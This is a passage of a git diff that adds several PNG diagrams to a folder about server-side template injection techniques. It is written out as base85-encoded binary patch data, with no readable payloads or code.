zXU+!n9^-$=@TX>UyBGNXynUYd6LLo75)R~RDWa)|S(H5BL$Qq-Jf$4mQE1o|A91^c
z&^{f}V=7NX-3&`%C`0LW_!WTy)twZ~Nb?%Vd7@ET-`I{THv17zZq-dgrcvb?;c%Ee
zIW=q&Ev7%2_`%L1Yd}3ky;PbgjJ=`94r=kP=GQf1^XDT`T7daIDZM9k304R_=N88m
zbz{Kj7Ba{(w<F}P)l-CI-FFr2toV3a|CcyH{nv+1S;-E<jI3#tMny?YX=&>QW09by
z17J*7j2icSEw)SZQS*j!xv_-MofRLm*)7>}SMJHQYrCXv-d3{i{jT`DIDbLH(mkSp
zS#OWY&Xt!~Qd^J5B2f<f(|6FatY?jts*oQiG0@%QHD$J9s*J?Z3YfFvJhLJp@7ZDH
zqMN$PX>Me5YKr%@faK#(ze4cdMh1C|?HL$Z91^6W6=S?L-Wm&Ts4^IoKGt^}nL=>D
z<NaY@3T<L83sa|!^Sigo0X3vG#&lmeKxqYzZq3qTxIfU*-1eexij>kEmdn*U88nO+
zjk23;Jg`vlzU!|Q)kpMUbT1le{TXiryE-=V>aHv9nI;qK8HRsv#6d~&TjmmIQ(=yn
z_{|>pNJ8AF3jQbJIa80^dqx*3lG_-Iz#NMMJ_K1wW=DA7L}YQX_C`-zbNZdU8zdxc
zg8mCh)pb_>8%ZstJ`$`(yBSg$>@Z#%wuUEJdFi}}0++dN-?sc~?w^C+e#;vvgw99|
z3r^-HNd}Ao3pajceD?-9-u%y08ZZ*V$^`%-e(P17`DB2^VsJn8MW9haC421AHTrWC
z{u~<*Wk(?Msjv%FKpCqPVO~JhUhX}G45z_Hc=@Ozh&mCcvNW#HY)aew8~_?Qz8iDf
zCX>8JTBR*9a#mo0b6EVYq2={C08os^P`@Jm^$GpE&HsBY`I}JxjbUf$&p?8A&Z0_=
zXpMHHhakC+0{brmOvY0T5#t_T_S>4FNaQl;>=l1IOkn;tupQTXvM91X;We(2=ee2z
zGP?vAszPd&&l)*=J?DKY84^m#0n0ZiZ`LF$D$*zqc#-2x;>&jQfN+`jDKpe{6)u3B
zhrPe$ewEBTNM!x)w<{iBI@lv$mj=A+7`q8LP(xj7;6lh+|LQNKOCCG{<tD2)!f+A0
z##5<}8m&vAc!|tP?Hi;&;}tB=EhT660LmI1&wF|m4K;RNUS8oQ2kbMa{U}bvNb@`a
zZ4aF3&-bhWahY8OCV;fH8f{Xpe)H+hy{XWu{>|)fq}y40a%giw8gjpU-GjSGvp}&9
zN;aTzm|H@Jut<53UlY*R*$ch^2*`RhaJ+p@0nC9OwM>}i;$a|RQrNC5X`9057Qoz}
zWG$o3x%dW<*m?C$sQv0eS&b>t`12t(Nd_oU<MW3X8i;CJ|BQvZ{|d=qUhuy%Ry;jj
zW%`q2fz%`Cm;J)r=R3BSOmwML#)vq!_!Fu9xyw)|&V$C9$UxPjIp7m(Hg|yJGtxoe
zGJBfuxkD3KECzTpdweOC|1}aRc}VJ(C~6g0U>jm=c@`-`4*;FNEx!M+dHo;XD>>~o
bo>Amy#5RuTPLbYu0f4fChCJ%2`K$i|%{iAv

literal 0
HcmV?d00001

diff --git a/Server Side Template Injection/Images/technique_Polyglot-Based.png b/Server Side Template Injection/Images/technique_Polyglot-Based.png
new file mode 100644
index 0000000000000000000000000000000000000000..5546e3bc12a0227545e58fa98fdf128151668ed6
GIT binary patch
literal 5164
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
LrmI?V(>CJoi<qJI

literal 0
HcmV?d00001

diff --git a/Server Side Template Injection/Images/technique_Rendered.png b/Server Side Template Injection/Images/technique_Rendered.png
new file mode 100644
index 0000000000000000000000000000000000000000..ff16946a3ee7c8be7a32925da33a879cd30fd2d6
GIT binary patch
literal 4370
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
Zq+`D|`@@qk@I3}#WodVmaM<<QzX8oLpF{uv

literal 0
HcmV?d00001

diff --git a/Server Side Template Injection/Images/technique_Time-Based.png b/Server Side Template Injection/Images/technique_Time-Based.png
new file mode 100644
index 0000000000000000000000000000000000000000..72fc7290c44ec47242ad47b423cad0ca35a9dbc0
GIT binary patch
literal 4744
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
